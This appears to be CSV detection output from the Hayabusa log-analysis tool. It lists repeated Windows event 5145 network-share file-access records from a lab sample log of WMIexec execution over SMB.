2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ib6702479#\662c453241af44299325f4c07d7f718c : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ic1a2041b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ic1a2041b#\154acb6c70e2dddd2c94bf0bc748b8b7 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ifcaec084# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ifcaec084#\9d9142f584dbdd4e6d4bd7fd6f877b66 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Kd58820a5# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Kd58820a5#\ba928c3b8a0cdac392162a6b572de29f : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.M870d558a# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.M870d558a#\1b67145a56e345e0d2e731357f498c1d : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Meefd589e# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Meefd589e#\e857b644c45626101624d874e1860701 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mf5ac9168# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mf5ac9168#\1b9aff98baffeed692a8e8768c0c4e47 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mf49f6405# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mf49f6405#\2f732bd1dcfeef1bb935c1d1444abdef : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mff1be75b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mff1be75b#\4844f53bd0e47d8f8a5795e6484a0f88 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P0e11b656# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P0e11b656#\a169d08938fb7766d16496db1e648137 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.811 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P6f9a5e83# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.811 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P6f9a5e83#\75b419c806fb708ac368c6282c922a84 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P6f792626# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P6f792626#\dd3aaf75f45749961d52d194dab801a2 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P08ac43d5# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P08ac43d5#\e18185ddd154ffdd54cb6c9f0ee8bd44 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P9de5a786# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P9de5a786#\c3205ecae7e5cd14582725a8b5e0d26b : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P10d01611# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P10d01611#\a29f0b2b0504e328a9aa939a93159e40 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P34f388c1# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P34f388c1#\46b29d8a49f03df40a948c722e1b8971 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P1706cafe# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P1706cafe#\45a67d74e9938935daab6173a971be6c : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.858 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P047767ce# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P047767ce#\b990850a0f13973108c783788afd003b : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P521220ea# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P521220ea#\c27e496be774922205ac8ce981a1d43f : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P655586bb# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P655586bb#\b00bc572c066b64da974fc25989bc647 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P39041136# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P39041136#\d5147e76aac8b85f995ed7aeb6936907 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.890 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pae3498d9# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pae3498d9#\92502f352b3e8ec57c8956a28e4dea98 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pb378ec07# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pb378ec07#\d9659b5db4bc25a33861dbc0ca19c837 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pcd26229b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pcd26229b#\adfb2cd1f200788f6e0472379725ce7f : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pd3efef62# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pd3efef62#\379936827e72fda4d66f53769c06c9ee : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pefb7a36b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pefb7a36b#\4a462e10f0ca871771e1eba0d4708e2e : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.907 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.R251a4777# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.907 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.R251a4777#\ab7fb35e2fb3e61e15dcaabbd82b7508 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.907 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S0f8e494c# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S0f8e494c#\97871d486d086e08c66cb7bf9335e012 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.938 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S1bc92e04# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.938 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S1bc92e04#\931ade8881fd66e64743490a332ca6a8 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
